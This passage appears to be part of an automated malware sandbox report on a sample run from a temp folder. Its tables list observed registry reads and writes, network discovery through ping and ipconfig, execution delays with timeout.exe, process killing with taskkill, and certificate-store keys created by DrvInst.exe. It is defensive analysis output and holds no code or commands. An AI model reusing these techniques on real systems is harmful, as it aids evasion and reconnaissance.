| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\wim.dll | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\PING.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\PING.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\DroidCam\vc_redist.x86.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\DroidCam\vc_redist.x86.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\PING.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\xcopy.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
NSIS installer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\ipconfig.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\37\IEPropFontName = "Leelawadee UI" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\10 | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\26 | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\29 | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\35\IEFixedFontName = "Estrangelo Edessa" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\DOMStorage\youtube.com\Total = "282" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\11\IEPropFontName = "Shonar Bangla" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\3\IEPropFontName = "Times New Roman" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\15 | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\10\IEPropFontName = "Kokila" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\SearchScopes | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.youtube.com\ = "282" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\18\IEFixedFontName = "Kartika" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\35\IEPropFontName = "Estrangelo Edessa" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\38\IEPropFontName = "MV Boli" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "437219416" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\16\IEPropFontName = "Vani" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\27\IEPropFontName = "Ebrima" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\27\IEFixedFontName = "Ebrima" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.youtube.com | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\13\IEFixedFontName = "Shruti" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\14\IEPropFontName = "Kalinga" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\25\IEFixedFontName = "MingLiu" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\11\IEFixedFontName = "Shonar Bangla" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\8 | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\36\IEPropFontName = "Myanmar Text" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\33\IEPropFontName = "Times New Roman" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\4\IEFixedFontName = "Courier New" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\DOMStorage\youtube.com\NumberOfSubdomains = "1" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\9\IEPropFontName = "Times New Roman" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\DOMStorage\youtube.com\Total = "0" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\34 | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\5\IEPropFontName = "Times New Roman" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\20\IEPropFontName = "Leelawadee UI" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\29\IEPropFontName = "Gadugi" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\39\IEFixedFontName = "Mongolian Baiti" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\6\IEPropFontName = "Times New Roman" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.youtube.com\ = "10998" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\30 | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\20\IEFixedFontName = "Leelawadee UI" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\23\IEFixedFontName = "GulimChe" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\25\IEPropFontName = "PMingLiu" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\28\IEPropFontName = "Gadugi" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{7B65CF41-9DB2-11EF-AE37-6A7FEBC734DB} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\13 | C:\Windows\SysWOW64\reg.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
